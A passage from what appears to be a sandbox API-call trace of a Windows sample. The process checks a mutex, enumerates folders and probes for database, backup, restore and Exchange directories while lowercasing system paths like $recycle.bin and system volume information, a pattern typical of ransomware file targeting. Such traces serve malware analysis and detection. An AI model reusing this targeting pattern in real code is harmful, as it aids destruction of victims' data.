GlobalUnlock (hMem=0x450004) returned 0 [0109.334] GlobalLock (hMem=0x450004) returned 0x591988 [0109.334] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.334] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.334] GlobalUnlock (hMem=0x450004) returned 0 [0109.334] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.334] GlobalUnlock (hMem=0x45000c) returned 0 [0109.334] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.334] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46d35b00, ftCreationTime.dwHighDateTime=0x1cba077, ftLastAccessTime.dwLowDateTime=0xd9e40080, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x46d35b00, ftLastWriteTime.dwHighDateTime=0x1cba077, nFileSizeHigh=0x0, nFileSizeLow=0x206b78, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISFILT.DLL", cAlternateFileName="")) returned 1 [0109.334] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.334] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.334] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.334] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.334] GlobalUnlock (hMem=0x45000c) returned 0 [0109.334] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.335] GlobalLock (hMem=0x450004) returned 0x593998 [0109.335] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.335] GlobalUnlock (hMem=0x45000c) returned 0 [0109.335] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.335] GlobalUnlock (hMem=0x450004) returned 0 [0109.335] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.335] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46d35b00, ftCreationTime.dwHighDateTime=0x1cba077, ftLastAccessTime.dwLowDateTime=0xd9e40080, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x46d35b00, ftLastWriteTime.dwHighDateTime=0x1cba077, nFileSizeHigh=0x0, nFileSizeLow=0x206b78, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISFILT.DLL", cAlternateFileName="")) returned 0 [0109.335] GetLastError () returned 0x12 [0109.335] FindClose (in: hFindFile=0x58b020 | out: hFindFile=0x58b020) returned 1 [0109.335] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRPHFLT", cAlternateFileName="")) returned 1 [0109.335] FileTimeToLocalFileTime (in: lpFileTime=0x18f1f8, lpLocalFileTime=0x18f104 | out: lpLocalFileTime=0x18f104) returned 1 [0109.335] FileTimeToDosDateTime (in: lpFileTime=0x18f104, lpFatDate=0x18f1c6, lpFatTime=0x18f1c4 | out: lpFatDate=0x18f1c6, lpFatTime=0x18f1c4) returned 1 [0109.335] GlobalLock (hMem=0x450004) returned 0x591988 [0109.335] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.335] GlobalUnlock (hMem=0x450004) returned 0 [0109.336] GlobalLock (hMem=0x450004) returned 0x591988 [0109.336] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.336] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.336] GlobalUnlock (hMem=0x450004) returned 0 [0109.336] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.336] GlobalUnlock (hMem=0x45000c) returned 0 [0109.336] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.336] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.336] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.336] GlobalUnlock (hMem=0x45000c) returned 0 [0109.336] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.336] GlobalLock (hMem=0x450004) returned 0x593998 [0109.336] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.336] GlobalUnlock (hMem=0x45000c) returned 0 [0109.336] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.336] GlobalUnlock (hMem=0x450004) returned 0 [0109.336] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.336] SysReAllocStringLen (in: pbstr=0x18f104*=0x0, psz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT", len=0x36 | out: pbstr=0x18f104*="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT") returned 1 [0109.336] GlobalLock (hMem=0x450004) returned 0x591988 [0109.336] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.336] GlobalUnlock (hMem=0x450004) returned 0 [0109.336] GlobalLock (hMem=0x450004) returned 0x591988 [0109.337] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.337] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.337] GlobalUnlock (hMem=0x450004) returned 0 [0109.337] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.337] GlobalUnlock (hMem=0x45000c) returned 0 [0109.337] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Microsoft\\Exchange Server", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="䱈@鼦W黺W企@\x18㼔V\x18\x1b")) returned 0xffffffff [0109.377] GetLastError () returned 0x3 [0109.377] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.377] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d360, cbMultiByte=26, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0109.380] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=21, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\ct Edition\\ition\\") returned 21 [0109.380] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Microsoft SQL Server", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="㎌W䱠@麌W企@\x18㽜V\x181")) returned 0xffffffff [0109.382] GetLastError () returned 0x2 [0109.382] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.382] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d360, cbMultiByte=21, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0109.382] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=9, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\ct Edition\\ition\\") returned 9 [0109.382] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Firebird", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="㎌W䱠@V企@\x18㪔X\x18;")) returned 0xffffffff [0109.384] GetLastError () returned 0x2 [0109.384] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0109.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=8, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\ct Edition\\ition\\") returned 8 [0109.384] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MSSQL.1", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="㎌W䱠@鳜W企@\x18㧴X\x18D")) returned 0xffffffff [0109.386] GetLastError () returned 0x2 [0109.386] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=8, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\ ") returned 8 [0109.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=37, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\ition\\") returned 37 [0109.386] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="㎌W䱠@麌W企@\x18V\x18j")) returned 0xffffffff [0109.387] GetLastError () returned 0x2 [0109.388] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.388] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ace8, cbMultiByte=37, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\ition\\") returned 37 [0109.388] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\ition\\") returned 6 [0109.388] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Adobe", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="㎌W䱠@鳜W企@\x18㪔X\x18q")) returned 0xffffffff [0109.389] GetLastError () returned 0x2 [0109.389] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.389] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="adobe\\V\x90") returned 6 [0109.390] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\ition\\") returned 7 [0109.390] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Oracle", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="㎌W䱠@仔W企@\x18㧴X\x18y")) returned 0xffffffff [0109.391] GetLastError () returned 0x2 [0109.391] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.391] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="oracle\\X ") returned 7 [0109.391] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\ition\\") returned 7 [0109.392] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Archive", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="㎌W䱠@倴W企@\x18㪔X\x18\x81")) returned 0xffffffff [0109.395] GetLastError () returned 0x2 [0109.395] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="archiveX ") returned 7 [0109.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\ition\\") returned 6 [0109.396] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Backup", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="㎌W䱠@鳜W企@\x18㧴X\x18\x88")) returned 0xffffffff [0109.397] GetLastError () returned 0x2 [0109.397] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.397] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="backup㪐X ") returned 6 [0109.397] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\ition\\") returned 6 [0109.397] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Reserv", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="㎌W䱠@仔W企@\x18㪔X\x18\x8f")) returned 0xffffffff [0109.399] GetLastError () returned 0x2 [0109.399] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.399] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="reserv㧰X ") returned 6 [0109.399] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\ition\\") returned 7 [0109.399] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Restore", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="㎌W䱠@倴W企@\x18㧴X\x18\x97")) returned 0xffffffff [0109.401] GetLastError () returned 0x2 [0109.401] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.401] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="restoreX ") returned 7 [0109.401] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.401] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.401] GlobalUnlock (hMem=0x45000c) returned 0 [0109.401] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.402] GlobalLock (hMem=0x450004) returned 0x593998 [0109.402] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.402] GlobalUnlock (hMem=0x45000c) returned 0 [0109.402] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.402] GlobalUnlock (hMem=0x450004) returned 0 [0109.402] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.402] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0109.402] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab08, cbMultiByte=15, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\") returned 15 [0109.402] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.402] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0109.402] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79fe8, cbMultiByte=46, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 46 [0109.402] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.402] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0109.402] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aaa8, cbMultiByte=15, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0109.403] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.403] GetEnvironmentVariableA (in: lpName="WINDIR", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\Windows") returned 0xa [0109.403] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a38, cbMultiByte=11, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\windows\\ata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 [0109.403] GlobalLock (hMem=0x450004) returned 0x591988 [0109.403] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.403] GlobalUnlock (hMem=0x450004) returned 0 [0109.403] GlobalLock (hMem=0x450004) returned 0x591988 [0109.403] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.403] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.403] GlobalUnlock (hMem=0x450004) returned 0 [0109.403] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.403] GlobalUnlock (hMem=0x45000c) returned 0 [0109.403] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.403] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aaa8, cbMultiByte=15, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\$recycle.bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0109.404] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.404] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=11, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\all users\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 [0109.404] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.404] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\appdata\\s\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 [0109.404] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.404] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aaa8, cbMultiByte=18, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\application data\\alpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 18 [0109.405] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.405] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=28, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\system volume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 28 [0109.405] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.405] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=10, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\windows\\olume 